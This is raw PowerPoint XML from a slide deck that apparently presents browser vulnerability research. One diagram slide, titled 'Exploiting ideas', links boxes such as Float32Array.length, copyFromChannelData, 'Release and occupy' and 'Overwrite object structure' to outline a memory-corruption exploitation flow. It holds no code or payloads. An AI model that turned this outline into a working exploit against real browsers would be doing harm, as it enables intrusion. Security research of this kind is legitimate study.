              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A71AC10C-0D87-464E-8097-D15AEC64DD2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096591" y="5350510"/>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mn-ea"/>
              </a:rPr>
              <a:t>Float32Array.length</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="直接箭头连接符 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C48DB86B-DFCF-43FC-A8F1-2C9E20A44C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4247758" y="4236165"/>
            <a:ext cx="1848833" cy="984964"/>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16" name="直接箭头连接符 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96A7FDA-3028-42A1-AA42-092342CCDB1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4247758" y="5221129"/>
            <a:ext cx="1848833" cy="573881"/>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18" name="矩形: 圆角 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A033076-CCC1-48F8-BC4C-CC7D190D5D4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326758" y="6753429"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DataConversion</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接箭头连接符 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E746A8D-5671-4399-B74E-99FDCADAC505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787258" y="5665629"/>
            <a:ext cx="0" cy="108780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26" name="直接箭头连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013DE7C7-D5F4-4E0A-88AD-37ED1DD18765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="3"/>
            <a:endCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247758" y="7197929"/>
            <a:ext cx="1848833"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29" name="矩形: 圆角 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4E020CC-251D-4608-B3DA-509EB7351143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096591" y="6753429"/>
            <a:ext cx="2348304"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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Free&amp;GC&amp;AllocateObject</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="连接符: 肘形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BDD9B9-2E4F-4DCD-8E1E-CCB160CC1E9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8444895" y="4236165"/>
            <a:ext cx="572696" cy="2961764"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 139916"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="矩形: 圆角 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EEE96D9-C083-4BF8-86A2-D068FD598439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096591" y="3801247"/>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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Occupy object data structure</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="矩形: 圆角 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC43396-8744-4ECD-AB96-5D46EBB1B092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326758" y="8677048"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>copyFromChannelData</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="直接箭头连接符 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64267AE-7CFB-461A-B4DD-F767785AFBFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787258" y="7642429"/>
            <a:ext cx="0" cy="1034619"/>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44" name="矩形: 圆角 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FEFD95F-D28E-4F34-88CD-A1437D38B066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117032" y="8677048"/>
            <a:ext cx="2921000" cy="889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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Data in Channel</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="直接箭头连接符 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{513E850F-5155-464A-8AC2-1C378D4D3C4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39" idx="3"/>
            <a:endCxn id="44" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247758" y="9121548"/>
            <a:ext cx="1869274" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="连接符: 肘形 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0CC4B33-C843-4B64-B34D-F908AEF9212E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="3"/>
            <a:endCxn id="38" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9017591" y="4245747"/>
            <a:ext cx="20441" cy="4875801"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6399393"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="文本框 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6ABFF0-193D-42B4-931F-820534CA708B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2602960"/>
            <a:ext cx="2247731" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Exploiting ideas</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0D6462A-565D-44DF-928B-CCA5B4D63CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084101" y="4287538"/>
            <a:ext cx="1888162" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subfunction call</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D3F772-931B-4DCC-82D7-0421D87DA535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398018" y="5988192"/>
            <a:ext cx="1157131" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Follow-up function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEAB790E-EEA1-4EA0-83D3-CD89A2F3AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1449616" y="7925904"/>
            <a:ext cx="1157131" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Follow-up function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D69FC9-D48C-44BF-844D-C6C446B0B998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778089" y="4186510"/>
            <a:ext cx="1572383" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cache</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C864C5-595E-47AD-A62C-4FC8B5190B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8444895" y="7270222"/>
            <a:ext cx="1347394" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release and occupy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71418ED3-30D7-4F21-9478-9CE8A00BD04E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4709397" y="6712849"/>
            <a:ext cx="1157131" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Callback</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6EB1A73-8737-4E3A-B26F-2EAA21EE03F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9213723" y="9196716"/>
            <a:ext cx="2059507" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overwrite object structure</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1394398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2" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="1" animBg="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33"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1484</TotalTime>
  <Words>5613</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>883</Paragraphs>
  <Slides>83</Slides>
  <Notes>73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83</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="92" baseType="lpstr">
      <vt:lpstr>FZChaoCuHei-M10</vt:lpstr>
      <vt:lpstr>Hiragino Sans GB W6</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>SimHei</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Liu, Jin</cp:lastModifiedBy>
  <cp:revision>1019</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-24T03:01:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-24T19:50:50Z</dcterms:modified>
</cp:coreProperties>
</file>